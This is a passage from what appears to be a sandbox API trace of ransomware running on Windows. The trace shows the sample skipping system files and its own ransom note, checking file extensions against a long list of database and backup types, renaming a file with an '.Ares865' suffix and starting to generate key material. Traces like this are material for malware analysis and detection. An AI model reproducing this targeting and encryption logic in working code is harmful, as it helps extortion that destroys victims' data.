(HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0086.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0086.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0086.801] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0086.801] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0086.805] CloseHandle (hObject=0x15c) returned 1 [0086.805] CloseHandle (hObject=0x118) returned 1 [0086.805] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0086.805] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0086.805] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0086.806] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94d0df00, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x94d0df00, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0086.806] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0086.806] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="aoldtz.exe") returned 1 [0086.806] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="..") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="windows") returned -1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="bootmgr") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="temp") returned -1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="boot") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="ids.txt") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="perflogs") returned 1 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="MSBuild") returned 1 [0086.807] lstrlenW (lpString="SGRES.DLL.trx_dll") returned 17 [0086.807] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 73 [0086.807] lstrcpyW (in: lpString1=0x2cce468, lpString2="SGRES.DLL.trx_dll" | out: lpString1="SGRES.DLL.trx_dll") returned="SGRES.DLL.trx_dll" [0086.807] lstrlenW (lpString="SGRES.DLL.trx_dll") returned 17 [0086.807] lstrlenW (lpString="Ares865") returned 7 [0086.807] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0086.807] lstrlenW (lpString=".dll") returned 4 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".dll") returned 1 [0086.807] lstrlenW (lpString=".lnk") returned 4 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".lnk") returned 1 [0086.807] lstrlenW (lpString=".ini") returned 4 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".ini") returned 1 [0086.807] lstrlenW (lpString=".sys") returned 4 [0086.807] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2=".sys") returned 1 [0086.807] lstrlenW (lpString="SGRES.DLL.trx_dll") returned 17 [0086.807] lstrlenW (lpString="bak") returned 3 [0086.807] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0086.807] lstrlenW (lpString="ba_") returned 3 [0086.807] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0086.807] lstrlenW (lpString="dbb") returned 3 [0086.807] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0086.807] lstrlenW (lpString="vmdk") returned 4 [0086.807] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0086.807] lstrlenW (lpString="rar") returned 3 [0086.807] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0086.807] lstrlenW (lpString="zip") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0086.808] lstrlenW (lpString="tgz") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0086.808] lstrlenW (lpString="vbox") returned 4 [0086.808] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0086.808] lstrlenW (lpString="vdi") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0086.808] lstrlenW (lpString="vhd") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0086.808] lstrlenW (lpString="vhdx") returned 4 [0086.808] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0086.808] lstrlenW (lpString="avhd") returned 4 [0086.808] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0086.808] lstrlenW (lpString="db") returned 2 [0086.808] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0086.808] lstrlenW (lpString="db2") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0086.808] lstrlenW (lpString="db3") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0086.808] lstrlenW (lpString="dbf") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0086.808] lstrlenW (lpString="mdf") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0086.808] lstrlenW (lpString="mdb") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0086.808] lstrlenW (lpString="sql") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0086.808] lstrlenW (lpString="sqlite") returned 6 [0086.808] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0086.808] lstrlenW (lpString="sqlite3") returned 7 [0086.808] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0086.808] lstrlenW (lpString="sqlitedb") returned 8 [0086.808] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0086.808] lstrlenW (lpString="xml") returned 3 [0086.808] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0086.808] lstrlenW (lpString="$er") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0086.809] lstrlenW (lpString="4dd") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0086.809] lstrlenW (lpString="4dl") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0086.809] lstrlenW (lpString="^^^") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0086.809] lstrlenW (lpString="abs") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0086.809] lstrlenW (lpString="abx") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0086.809] lstrlenW (lpString="accdb") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0086.809] lstrlenW (lpString="accdc") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0086.809] lstrlenW (lpString="accde") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0086.809] lstrlenW (lpString="accdr") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0086.809] lstrlenW (lpString="accdt") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0086.809] lstrlenW (lpString="accdw") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0086.809] lstrlenW (lpString="accft") returned 5 [0086.809] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0086.809] lstrlenW (lpString="adb") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.809] lstrlenW (lpString="adb") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0086.809] lstrlenW (lpString="ade") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0086.809] lstrlenW (lpString="adf") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0086.809] lstrlenW (lpString="adn") returned 3 [0086.809] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0086.809] lstrlenW (lpString="adp") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0086.810] lstrlenW (lpString="alf") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0086.810] lstrlenW (lpString="ask") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0086.810] lstrlenW (lpString="btr") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0086.810] lstrlenW (lpString="cat") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0086.810] lstrlenW (lpString="cdb") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0086.810] lstrlenW (lpString="ckp") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0086.810] lstrlenW (lpString="cma") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0086.810] lstrlenW (lpString="cpd") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0086.810] lstrlenW (lpString="dacpac") returned 6 [0086.810] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0086.810] lstrlenW (lpString="dad") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0086.810] lstrlenW (lpString="dadiagrams") returned 10 [0086.810] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0086.810] lstrlenW (lpString="daschema") returned 8 [0086.810] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0086.810] lstrlenW (lpString="db-journal") returned 10 [0086.810] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0086.810] lstrlenW (lpString="db-shm") returned 6 [0086.810] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0086.810] lstrlenW (lpString="db-wal") returned 6 [0086.810] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0086.810] lstrlenW (lpString="dbc") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0086.810] lstrlenW (lpString="dbs") returned 3 [0086.810] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0086.810] lstrlenW (lpString="dbt") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0086.811] lstrlenW (lpString="dbv") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0086.811] lstrlenW (lpString="dbx") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0086.811] lstrlenW (lpString="dcb") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0086.811] lstrlenW (lpString="dct") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0086.811] lstrlenW (lpString="dcx") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0086.811] lstrlenW (lpString="ddl") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0086.811] lstrlenW (lpString="dlis") returned 4 [0086.811] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0086.811] lstrlenW (lpString="dp1") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0086.811] lstrlenW (lpString="dqy") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0086.811] lstrlenW (lpString="dsk") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0086.811] lstrlenW (lpString="dsn") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0086.811] lstrlenW (lpString="dtsx") returned 4 [0086.811] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0086.811] lstrlenW (lpString="dxl") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0086.811] lstrlenW (lpString="eco") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0086.811] lstrlenW (lpString="ecx") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0086.811] lstrlenW (lpString="edb") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0086.811] lstrlenW (lpString="epim") returned 4 [0086.811] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0086.811] lstrlenW (lpString="fcd") returned 3 [0086.811] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0086.812] lstrlenW (lpString="fdb") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0086.812] lstrlenW (lpString="fic") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0086.812] lstrlenW (lpString="flexolibrary") returned 12 [0086.812] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0086.812] lstrlenW (lpString="fm5") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0086.812] lstrlenW (lpString="fmp") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0086.812] lstrlenW (lpString="fmp12") returned 5 [0086.812] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0086.812] lstrlenW (lpString="fmpsl") returned 5 [0086.812] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0086.812] lstrlenW (lpString="fol") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0086.812] lstrlenW (lpString="fp3") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0086.812] lstrlenW (lpString="fp4") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0086.812] lstrlenW (lpString="fp5") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0086.812] lstrlenW (lpString="fp7") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0086.812] lstrlenW (lpString="fpt") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0086.812] lstrlenW (lpString="frm") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0086.812] lstrlenW (lpString="gdb") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.812] lstrlenW (lpString="gdb") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0086.812] lstrlenW (lpString="grdb") returned 4 [0086.812] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0086.812] lstrlenW (lpString="gwi") returned 3 [0086.812] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0086.813] lstrlenW (lpString="hdb") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0086.813] lstrlenW (lpString="his") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0086.813] lstrlenW (lpString="ib") returned 2 [0086.813] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0086.813] lstrlenW (lpString="idb") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0086.813] lstrlenW (lpString="ihx") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0086.813] lstrlenW (lpString="itdb") returned 4 [0086.813] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0086.813] lstrlenW (lpString="itw") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0086.813] lstrlenW (lpString="jet") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0086.813] lstrlenW (lpString="jtx") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0086.813] lstrlenW (lpString="kdb") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0086.813] lstrlenW (lpString="kexi") returned 4 [0086.813] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0086.813] lstrlenW (lpString="kexic") returned 5 [0086.813] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0086.813] lstrlenW (lpString="kexis") returned 5 [0086.813] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0086.813] lstrlenW (lpString="lgc") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0086.813] lstrlenW (lpString="lwx") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0086.813] lstrlenW (lpString="maf") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0086.813] lstrlenW (lpString="maq") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0086.813] lstrlenW (lpString="mar") returned 3 [0086.813] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0086.813] lstrlenW (lpString="marshal") returned 7 [0086.814] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0086.814] lstrlenW (lpString="mas") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0086.814] lstrlenW (lpString="mav") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0086.814] lstrlenW (lpString="maw") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0086.814] lstrlenW (lpString="mdbhtml") returned 7 [0086.814] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0086.814] lstrlenW (lpString="mdn") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0086.814] lstrlenW (lpString="mdt") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0086.814] lstrlenW (lpString="mfd") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0086.814] lstrlenW (lpString="mpd") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0086.814] lstrlenW (lpString="mrg") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0086.814] lstrlenW (lpString="mud") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0086.814] lstrlenW (lpString="mwb") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0086.814] lstrlenW (lpString="myd") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0086.814] lstrlenW (lpString="ndf") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0086.814] lstrlenW (lpString="nnt") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0086.814] lstrlenW (lpString="nrmlib") returned 6 [0086.814] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0086.814] lstrlenW (lpString="ns2") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0086.814] lstrlenW (lpString="ns3") returned 3 [0086.814] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0086.814] lstrlenW (lpString="ns4") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0086.815] lstrlenW (lpString="nsf") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0086.815] lstrlenW (lpString="nv") returned 2 [0086.815] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0086.815] lstrlenW (lpString="nv2") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0086.815] lstrlenW (lpString="nwdb") returned 4 [0086.815] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0086.815] lstrlenW (lpString="nyf") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0086.815] lstrlenW (lpString="odb") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.815] lstrlenW (lpString="odb") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0086.815] lstrlenW (lpString="oqy") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0086.815] lstrlenW (lpString="ora") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0086.815] lstrlenW (lpString="orx") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0086.815] lstrlenW (lpString="owc") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0086.815] lstrlenW (lpString="p96") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0086.815] lstrlenW (lpString="p97") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0086.815] lstrlenW (lpString="pan") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0086.815] lstrlenW (lpString="pdb") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0086.815] lstrlenW (lpString="pdm") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0086.815] lstrlenW (lpString="pnz") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0086.815] lstrlenW (lpString="qry") returned 3 [0086.815] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0086.816] lstrlenW (lpString="qvd") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0086.816] lstrlenW (lpString="rbf") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0086.816] lstrlenW (lpString="rctd") returned 4 [0086.816] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0086.816] lstrlenW (lpString="rod") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0086.816] lstrlenW (lpString="rodx") returned 4 [0086.816] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0086.816] lstrlenW (lpString="rpd") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0086.816] lstrlenW (lpString="rsd") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0086.816] lstrlenW (lpString="sas7bdat") returned 8 [0086.816] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0086.816] lstrlenW (lpString="sbf") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0086.816] lstrlenW (lpString="scx") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0086.816] lstrlenW (lpString="sdb") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0086.816] lstrlenW (lpString="sdc") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0086.816] lstrlenW (lpString="sdf") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0086.816] lstrlenW (lpString="sis") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0086.816] lstrlenW (lpString="spq") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0086.816] lstrlenW (lpString="te") returned 2 [0086.816] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0086.816] lstrlenW (lpString="teacher") returned 7 [0086.816] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0086.816] lstrlenW (lpString="tmd") returned 3 [0086.816] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0086.817] lstrlenW (lpString="tps") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0086.817] lstrlenW (lpString="trc") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.817] lstrlenW (lpString="trc") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0086.817] lstrlenW (lpString="trm") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0086.817] lstrlenW (lpString="udb") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0086.817] lstrlenW (lpString="udl") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0086.817] lstrlenW (lpString="usr") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0086.817] lstrlenW (lpString="v12") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0086.817] lstrlenW (lpString="vis") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0086.817] lstrlenW (lpString="vpd") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0086.817] lstrlenW (lpString="vvv") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0086.817] lstrlenW (lpString="wdb") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0086.817] lstrlenW (lpString="wmdb") returned 4 [0086.817] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0086.817] lstrlenW (lpString="wrk") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0086.817] lstrlenW (lpString="xdb") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0086.817] lstrlenW (lpString="xld") returned 3 [0086.817] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0086.817] lstrlenW (lpString="xmlff") returned 5 [0086.817] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0086.817] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.Ares865") returned 77 [0086.818] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0086.819] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\SGRES.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\sgres.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0086.819] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13152) returned 1 [0086.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0086.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0086.819] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0086.819] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0086.820] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0086.820] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0086.820] CreateFileMappingW 